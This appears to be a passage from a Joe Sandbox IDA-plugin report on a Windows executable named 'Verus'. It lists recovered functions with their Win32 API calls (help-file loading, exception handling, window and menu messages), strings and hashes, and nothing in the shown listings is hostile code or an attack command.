Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LibraryLoadlstrcat$FileModuleName
String ID: ::/how_to_use/fixate_disc.html
API String ID: 600303151-2485958199
Opcode ID: 309b9c867aeaae3d24a098766c8f4f446a6e045cb313323d027768102dc28feb
Instruction ID: f1f5f0a20292b477d0e5385782a45d025ee0e9415a3366e16d89bba9a0c99bcd
Opcode Fuzzy Hash: 309b9c867aeaae3d24a098766c8f4f446a6e045cb313323d027768102dc28feb
Instruction Fuzzy Hash: 60F0A4B65003047FE320EB61DC57FAB77A8EBD4710F408E2EB15586181EA74E504C7A6

Function 00437220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,00000103,00000103), ref: 00437244

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

lstrcatW.KERNEL32(?,00000000), ref: 00437268
lstrcatW.KERNEL32(?,::/how_to_use/device_configuration.html), ref: 00437274

Part of subcall function 00479694: LoadLibraryA.KERNEL32(?,?,74E2F770), ref: 004796E1
Part of subcall function 00479694: LoadLibraryA.KERNEL32(hhctrl.ocx,?,74E2F770), ref: 004796F7

Strings

::/how_to_use/device_configuration.html, xrefs: 0043726A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrlen$LibraryLoadlstrcat$FileModuleName
String ID: ::/how_to_use/device_configuration.html
API String ID: 600303151-3488787321
Opcode ID: b2370f16580381f2641ccc48cc6bac2501b319fd360fdcc12645ca8b3ef4e4f2
Instruction ID: 002e8547952f10afbe0d0bea59822b7e907763b568f5cbccbdeef5128d469f0f
Opcode Fuzzy Hash: b2370f16580381f2641ccc48cc6bac2501b319fd360fdcc12645ca8b3ef4e4f2
Instruction Fuzzy Hash: 43F0A4B65003047FE324EB61DC57FAB77A8EBC4710F408E2EF15586181EA78E504C7A6

Function 0043C710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 0043C769
__CxxThrowException@8.LIBCMT ref: 0043C780

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

DIL, xrefs: 0043C778
vector<T> too long, xrefs: 0043C735

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: DIL$vector<T> too long
API String ID: 1493993918-3756090690
Opcode ID: e1964dec497b0c3c281b91708188f78050389806d5e7a3376277e717637d22ce
Instruction ID: e8b35af13578162a0cb19b27bdc84f76d79a97e98eaa47ceff81471e6c42706b
Opcode Fuzzy Hash: e1964dec497b0c3c281b91708188f78050389806d5e7a3376277e717637d22ce
Instruction Fuzzy Hash: 15F062B11083419BD300DF55CA45F5BBBE4AB48B18F004A6EF195526C1C7B896088B1A

Function 00490F3C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00490F43
std::bad_exception::bad_exception.LIBCMTD ref: 00490F60

Part of subcall function 00402AB0: std::runtime_error::runtime_error.LIBCPMTD ref: 00402ABE

__CxxThrowException@8.LIBCMT ref: 00490F6E

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

invalid string position, xrefs: 00490F48

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 3299838469-1799206989
Opcode ID: 06adbfde82ed2f851f996e30503bd072c4465f053a85b49c0555f3b2b2eed4fe
Instruction ID: 1e117b67c8fb3d46d141b7c0c0d78586b4befaadafd3a48455df507867fe8ba6
Opcode Fuzzy Hash: 06adbfde82ed2f851f996e30503bd072c4465f053a85b49c0555f3b2b2eed4fe
Instruction Fuzzy Hash: 7CD0ECB19002089ACB00FBE1C95ABDD7778AB04715F10042BA201B60D2DAB86504C62C

Function 0046F070 Relevance: 6.2, APIs: 4, Instructions: 201windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 0046F152
SendMessageW.USER32(?,0000104C,00000000,00000000), ref: 0046F1E9
SendMessageW.USER32(?,0000104C,00000000,00000000), ref: 0046F27E
SendMessageW.USER32(?,0000104C,00000000,00000000), ref: 0046F2DD

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: f013191b8340cc7ba5e23b423dc05d97ea31d3f9a31372facba411ed54a22bb3
Instruction ID: 8d378f4bb4bc913a6d01ef0bd1eac54a1595d91e70fc051ddf20fb989b91f693
Opcode Fuzzy Hash: f013191b8340cc7ba5e23b423dc05d97ea31d3f9a31372facba411ed54a22bb3
Instruction Fuzzy Hash: 1491DEB1909341AFC790CF6AD480A5BBBE0BF88304F549A6EF599D7220E774D944CF4A

Function 00410E80 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMTD ref: 00410EC0
allocator.LIBCONCRTD ref: 00410EDC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Cnd_initallocatorstd::_
String ID:
API String ID: 2073291326-0
Opcode ID: 7549e04474535a1c7e15006d3b354d161453ef641579f74b0fb5b8c0025365c6
Instruction ID: 9bd51f42846083d627b4bcd83479a825b39ed38ac85688f8220513c038e5f958
Opcode Fuzzy Hash: 7549e04474535a1c7e15006d3b354d161453ef641579f74b0fb5b8c0025365c6
Instruction Fuzzy Hash: 005187B5D04108AFCB04DFD5C891DEFBBB9AF58304F04805EF505A7291DA78AA86CBA5

Function 00407000 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMTD ref: 00407040
allocator.LIBCONCRTD ref: 0040705C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Cnd_initallocatorstd::_
String ID:
API String ID: 2073291326-0
Opcode ID: f2af25f48fc409c8555655059fcf07ed00d8007a8b1be2eb82d810a0f6ae5e27
Instruction ID: db399f24f3b238ccc972bd30be291033680ccf543a53a2ef2d51ebf0e3fa29fc
Opcode Fuzzy Hash: f2af25f48fc409c8555655059fcf07ed00d8007a8b1be2eb82d810a0f6ae5e27
Instruction Fuzzy Hash: C45155B5D08108ABCB04DB95D891DEFB779AF58304F04816EF506B73C1DA38BA45CBA6

Function 004B9040 Relevance: 6.2, APIs: 4, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 004BC960: _wcslen.LIBCMT ref: 004BC967

_memset.LIBCMT ref: 004B9154
_memset.LIBCMT ref: 004B9170
_memset.LIBCMT ref: 004B918C
_memset.LIBCMT ref: 004B91A7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memset$_wcslen
String ID:
API String ID: 2220268819-0
Opcode ID: e82a5bc554508de400c964b11942c383f11b9ddb1fb483837fefff3ad6d7990b
Instruction ID: 08e4d69e9124889bd52c23b0359c12f6a5beb09811c8f10d828523fbf8d86475
Opcode Fuzzy Hash: e82a5bc554508de400c964b11942c383f11b9ddb1fb483837fefff3ad6d7990b
Instruction Fuzzy Hash: 506130B5D01258ABEB24DF54DC91FDEB775BF48304F0081AAF50967282DA355E84CFA8

Function 00452940 Relevance: 6.1, APIs: 4, Instructions: 138windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00468520: SendMessageW.USER32(?,00000418,00000000,000000C8), ref: 00468568
Part of subcall function 00468520: _memset.LIBCMT ref: 00468573
Part of subcall function 00468520: SendMessageW.USER32 ref: 004685C3
Part of subcall function 00468520: SendMessageW.USER32(?,00000401,00000001,00000000), ref: 004685D1

Part of subcall function 00446A40: GetClientRect.USER32 ref: 00446A65
Part of subcall function 00446A40: SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000014), ref: 00446AA0

IsWindowVisible.USER32 ref: 00452A74
ShowWindow.USER32(?,00000005), ref: 00452A89
ShowWindow.USER32(?,00000000), ref: 00452A91
GetClientRect.USER32(56000000,?), ref: 00452A4C

Part of subcall function 00446DB0: InvalidateRect.USER32(?,00000001,00000001), ref: 00446E1D
Part of subcall function 00446DB0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000004), ref: 00446E66

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$MessageRectSend$ClientShow$InvalidateVisible_memset
String ID:
API String ID: 1520195220-0
Opcode ID: 466117c31c9cf5ec9f4327a068732efbb14f2b3255c8756bd5ac48b10c124af6
Instruction ID: 36d5510b778140f43de991fdada273a2dce7fcd0923957970e10b96cf767862c
Opcode Fuzzy Hash: 466117c31c9cf5ec9f4327a068732efbb14f2b3255c8756bd5ac48b10c124af6
Instruction Fuzzy Hash: 11514DB0300701AFE724AF29CC56B9BBBE5AF45704F00450EF55A9B291DBB9B8048B99

Function 00470070 Relevance: 6.1, APIs: 4, Instructions: 134COMMON

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 004700FF
_memmove_s.LIBCMT ref: 0047012B

Part of subcall function 0046FFF0: std::runtime_error::runtime_error.LIBCPMTD ref: 00470049
Part of subcall function 0046FFF0: __CxxThrowException@8.LIBCMT ref: 00470060

_memmove_s.LIBCMT ref: 0047016A
_memmove_s.LIBCMT ref: 00470195

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memmove_s$Exception@8Throwstd::runtime_error::runtime_error
String ID:
API String ID: 459892327-0
Opcode ID: e7edd71834450ee6f94bebf21d33c2c57558a01cdc1d93584f14e0b7e95037a3
Instruction ID: 2031eb8e49e19012d10d7cc184789244a806fcd0d38b2195f54afda61f580d4f
Opcode Fuzzy Hash: e7edd71834450ee6f94bebf21d33c2c57558a01cdc1d93584f14e0b7e95037a3
Instruction Fuzzy Hash: F241A1B1A012029FEB28DF28DC91A7B73A5EB80300F454A2EEC55C7345E679ED1986A5

Function 00422120 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0042215F
SendMessageW.USER32(?,0000102C,00000000,0000F000), ref: 00422171
SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 004221E0
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004221ED

Part of subcall function 00420FA0: SendMessageW.USER32(?,0000102B,?,?), ref: 00420FED

Part of subcall function 004216A0: lstrlenW.KERNEL32(00000002), ref: 004216C5
Part of subcall function 004216A0: SendMessageW.USER32(?,0000102C,?,0000F000), ref: 004216E1
Part of subcall function 004216A0: lstrcmpW.KERNEL32(00000002,.irp,?,0000102C,?,0000F000), ref: 0042179E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$lstrcmplstrlen
String ID:
API String ID: 3049907233-0
Opcode ID: 5b989717b669474b027d1a1f315e358d70b64f926c3e19239dd13db9bad7003d
Instruction ID: a454e89e1eda37e14bd32eca58ad74ce7f4fafec0e592d73c559b48b2d64379e
Opcode Fuzzy Hash: 5b989717b669474b027d1a1f315e358d70b64f926c3e19239dd13db9bad7003d
Instruction Fuzzy Hash: DE41E331304221FBC720EF64ED41F2BB7A5AB98710F50465AF951932D1CBB9E805CABA

Function 004586B0 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004919DD: _malloc.LIBCMT ref: 004919F7

SendMessageW.USER32(?,0000100C,?,00000002), ref: 00458742
SendMessageW.USER32(?,0000104B,00000000,?), ref: 00458791
SendMessageW.USER32(?,0000100C,00000000,00000002), ref: 004587AF
DoDragDrop.OLE32(00000000,?,00000002,?), ref: 004587DF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$DragDrop_malloc
String ID:
API String ID: 2442433613-0
Opcode ID: a02b7507b07bc4385e369d9815bc2ee4126bb08e1b4ac5d8930ff6c5503d55ad
Instruction ID: 9e7953acf3fc73eeb18fa8a9e0b3985a14711bb60e45147aa8580cbebef8a366
Opcode Fuzzy Hash: a02b7507b07bc4385e369d9815bc2ee4126bb08e1b4ac5d8930ff6c5503d55ad
Instruction Fuzzy Hash: 624190B5604340AFC350DF69C841B5BBBE4EB88710F004A2EF999D7391EB789808CB96

Function 0045A380 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00008016,00000000), ref: 0045A3D1
EnableMenuItem.USER32(?,00008016,00000001), ref: 0045A42A

Part of subcall function 00432010: SendMessageW.USER32(?,00000401,?,?), ref: 00432024

EnableMenuItem.USER32(?,00008017,00000001), ref: 0045A460
EnableMenuItem.USER32(?,00008048,00000001), ref: 0045A499

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: EnableItemMenu$MessageSend
String ID:
API String ID: 224965116-0
Opcode ID: 52a1df249aa912e5119e6c5ba3610c56d8ca1ff3fd2a1d2f51599fca06e02a9a
Instruction ID: 42ecd99312b8af42619ef763321b46611c4493e16d7e71eeb7f830c712c692a6
Opcode Fuzzy Hash: 52a1df249aa912e5119e6c5ba3610c56d8ca1ff3fd2a1d2f51599fca06e02a9a
Instruction Fuzzy Hash: AD31AF3178030076F974A6814D4BF6A62A27B99F15F10851EBB913F2C2CFE96C4CE35A

Function 0044E120 Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0044E16F
GetMenuItemCount.USER32(?), ref: 0044E179
SendMessageW.USER32(?,00000417,?,?), ref: 0044E1BD
SendMessageW.USER32(?,0000041D,?,?), ref: 0044E1E0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ClientCountItemMenuRect
String ID:
API String ID: 4098442271-0
Opcode ID: 414211b63a8fe7697229a7a20f5fd2d964834433557079134b015014650c2503
Instruction ID: 27f9e0137e41f5f9569d136477e20ecc5ffc836f159f5f595ec2647e0e743029
Opcode Fuzzy Hash: 414211b63a8fe7697229a7a20f5fd2d964834433557079134b015014650c2503
Instruction Fuzzy Hash: 2F315CB2608350AFD340DF29D88196BFBE4BB8C324F404A2FF69997250D731A900CB96

Function 0044C1F0 Relevance: 6.1, APIs: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

